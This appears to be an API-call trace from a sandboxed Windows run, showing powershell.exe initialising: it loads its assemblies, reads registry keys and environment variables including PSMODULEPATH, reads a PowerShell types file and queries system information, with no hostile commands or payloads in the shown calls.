	[0507.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0507.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0507.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0507.618] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x314
	[0507.620] CoCreateGuid (in: pguid=0x12da30 | out: pguid=0x12da30*(Data1=0x7c53113c, Data2=0x782f, Data3=0x4318, Data4=([0]=0xaf, [1]=0x69, [2]=0xce, [3]=0x51, [4]=0xce, [5]=0x4f, [6]=0x43, [7]=0xc0))) returned 0x0
	[0507.621] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0507.621] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.622] CoTaskMemFree (pv=0x3ba680) 
	[0507.631] WinSqmIsOptedIn () returned 0x0
	[0507.631] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0507.631] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.631] CoTaskMemFree (pv=0x3ba680) 
	[0507.632] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0507.632] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.632] CoTaskMemFree (pv=0x3ba680) 
	[0507.632] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0507.632] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.632] CoTaskMemFree (pv=0x3ba680) 
	[0507.633] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0507.633] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.633] CoTaskMemFree (pv=0x3ba680) 
	[0507.634] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0507.634] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.634] CoTaskMemFree (pv=0x3ba680) 
	[0507.635] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0507.635] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.635] CoTaskMemFree (pv=0x3ba680) 
	[0507.636] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0507.636] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.636] CoTaskMemFree (pv=0x3ba680) 
	[0507.636] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0507.636] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.636] CoTaskMemFree (pv=0x3ba680) 
	[0507.639] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0507.639] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.639] CoTaskMemFree (pv=0x3ba680) 
	[0507.642] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0507.642] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.642] CoTaskMemFree (pv=0x3ba680) 
	[0507.643] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0507.643] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.643] CoTaskMemFree (pv=0x3ba680) 
	[0507.643] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0507.643] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.643] CoTaskMemFree (pv=0x3ba680) 
	[0509.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0509.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0509.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0509.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0510.371] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0510.371] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0510.372] CoTaskMemFree (pv=0x3ba680) 
	[0510.373] CoTaskMemAlloc (cb=0xcc) returned 0x3cd250
	[0510.373] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3cd250, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0510.373] CoTaskMemFree (pv=0x3cd250) 
	[0510.373] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d5a8 | out: phkResult=0x12d5a8*=0x2d8) returned 0x0
	[0510.373] RegQueryValueExW (in: hKey=0x2d8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12d52c, lpData=0x0, lpcbData=0x12d528*=0x0 | out: lpType=0x12d52c*=0x2, lpData=0x0, lpcbData=0x12d528*=0x6c) returned 0x0
	[0510.373] CoTaskMemAlloc (cb=0x70) returned 0x3559d0
	[0510.373] RegQueryValueExW (in: hKey=0x2d8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12d4fc, lpData=0x3559d0, lpcbData=0x12d4f8*=0x6c | out: lpType=0x12d4fc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x12d4f8*=0x6c) returned 0x0
	[0510.374] CoTaskMemFree (pv=0x3559d0) 
	[0510.374] CoTaskMemAlloc (cb=0xcc) returned 0x3cd250
	[0510.374] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x3cd250, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0510.374] CoTaskMemFree (pv=0x3cd250) 
	[0510.374] CoTaskMemAlloc (cb=0xcc) returned 0x3cd250
	[0510.374] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3cd250, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0510.374] CoTaskMemFree (pv=0x3cd250) 
	[0510.377] RegCloseKey (hKey=0x2d8) returned 0x0
	[0510.377] CoTaskMemAlloc (cb=0xcc) returned 0x3cd250
	[0510.377] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3cd250, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0510.377] CoTaskMemFree (pv=0x3cd250) 
	[0510.377] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d5a8 | out: phkResult=0x12d5a8*=0x2d8) returned 0x0
	[0510.378] RegQueryValueExW (in: hKey=0x2d8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12d52c, lpData=0x0, lpcbData=0x12d528*=0x0 | out: lpType=0x12d52c*=0x0, lpData=0x0, lpcbData=0x12d528*=0x0) returned 0x2
	[0510.378] RegCloseKey (hKey=0x2d8) returned 0x0
	[0510.381] CoTaskMemAlloc (cb=0x20c) returned 0x3a7110
	[0510.381] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3a7110 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0510.383] CoTaskMemFree (pv=0x3a7110) 
	[0510.383] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x12d130, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0510.384] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0511.013] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0511.013] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0511.013] CoTaskMemFree (pv=0x3ba680) 
	[0511.015] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0511.015] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0511.015] CoTaskMemFree (pv=0x3ba680) 
	[0511.024] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0511.024] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0511.024] CoTaskMemFree (pv=0x3ba680) 
	[0511.024] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0511.024] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0511.024] CoTaskMemFree (pv=0x3ba680) 
	[0511.025] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d398 | out: phkResult=0x12d398*=0x324) returned 0x0
	[0511.026] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x12d3ac, lpData=0x0, lpcbData=0x12d3a8*=0x0 | out: lpType=0x12d3ac*=0x1, lpData=0x0, lpcbData=0x12d3a8*=0x74) returned 0x0
	[0511.026] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x12d31c, lpData=0x0, lpcbData=0x12d318*=0x0 | out: lpType=0x12d31c*=0x1, lpData=0x0, lpcbData=0x12d318*=0x74) returned 0x0
	[0511.026] CoTaskMemAlloc (cb=0x78) returned 0x3559d0
	[0511.026] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x12d2ec, lpData=0x3559d0, lpcbData=0x12d2e8*=0x74 | out: lpType=0x12d2ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x12d2e8*=0x74) returned 0x0
	[0511.026] CoTaskMemFree (pv=0x3559d0) 
	[0511.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x12d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0511.026] SetErrorMode (uMode=0x1) returned 0x1
	[0511.027] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x12d270 | out: lpFileInformation=0x12d270*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0511.027] SetErrorMode (uMode=0x1) returned 0x1
	[0511.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0511.027] SetErrorMode (uMode=0x1) returned 0x1
	[0511.027] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d270 | out: lpFileInformation=0x12d270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0511.028] SetErrorMode (uMode=0x1) returned 0x1
	[0511.028] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0511.028] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0511.028] CoTaskMemFree (pv=0x3ba680) 
	[0511.029] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0511.029] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0511.029] CoTaskMemFree (pv=0x3ba680) 
	[0511.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0511.035] SetErrorMode (uMode=0x1) returned 0x1
	[0511.036] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0511.036] GetFileType (hFile=0x328) returned 0x1
	[0511.036] SetErrorMode (uMode=0x1) returned 0x1
	[0511.036] GetFileType (hFile=0x328) returned 0x1
	[0511.037] ReadFile (in: hFile=0x328, lpBuffer=0x2dfb9d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dfb9d8*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0511.039] ReadFile (in: hFile=0x328, lpBuffer=0x2dfb9d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dfb9d8*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0511.039] ReadFile (in: hFile=0x328, lpBuffer=0x2dfb9d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dfb9d8*, lpNumberOfBytesRead=0x12d1a8*=0x1000, lpOverlapped=0x0) returned 1
	[0511.040] ReadFile (in: hFile=0x328, lpBuffer=0x2dfb9d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dfb9d8*, lpNumberOfBytesRead=0x12d1a8*=0xcf3, lpOverlapped=0x0) returned 1
	[0511.040] ReadFile (in: hFile=0x328, lpBuffer=0x2dfae33, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dfae33*, lpNumberOfBytesRead=0x12d1a8*=0x0, lpOverlapped=0x0) returned 1
	[0511.040] ReadFile (in: hFile=0x328, lpBuffer=0x2dfb9d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dfb9d8*, lpNumberOfBytesRead=0x12d1a8*=0x0, lpOverlapped=0x0) returned 1
	[0511.043] CloseHandle (hObject=0x328) returned 1
	[0511.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0511.611] SetErrorMode (uMode=0x1) returned 0x1
	[0511.611] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d120 | out: lpFileInformation=0x12d120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0511.611] SetErrorMode (uMode=0x1) returned 0x1
	[0511.613] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0511.613] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d208 | out: phkResult=0x12d208*=0x328) returned 0x0
	[0511.613] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d18c, lpData=0x0, lpcbData=0x12d188*=0x0 | out: lpType=0x12d18c*=0x1, lpData=0x0, lpcbData=0x12d188*=0x56) returned 0x0
	[0511.613] CoTaskMemAlloc (cb=0x5a) returned 0x1b7c0cd0
	[0511.614] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d15c, lpData=0x1b7c0cd0, lpcbData=0x12d158*=0x56 | out: lpType=0x12d15c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d158*=0x56) returned 0x0
	[0511.614] CoTaskMemFree (pv=0x1b7c0cd0) 
	[0511.614] RegCloseKey (hKey=0x328) returned 0x0
	[0511.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0511.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0512.369] GetSystemInfo (in: lpSystemInfo=0x12be40 | out: lpSystemInfo=0x12be40*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0512.370] VirtualQuery (in: lpAddress=0x12bef0, lpBuffer=0x12cdb0, dwLength=0x30 | out: lpBuffer=0x12cdb0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
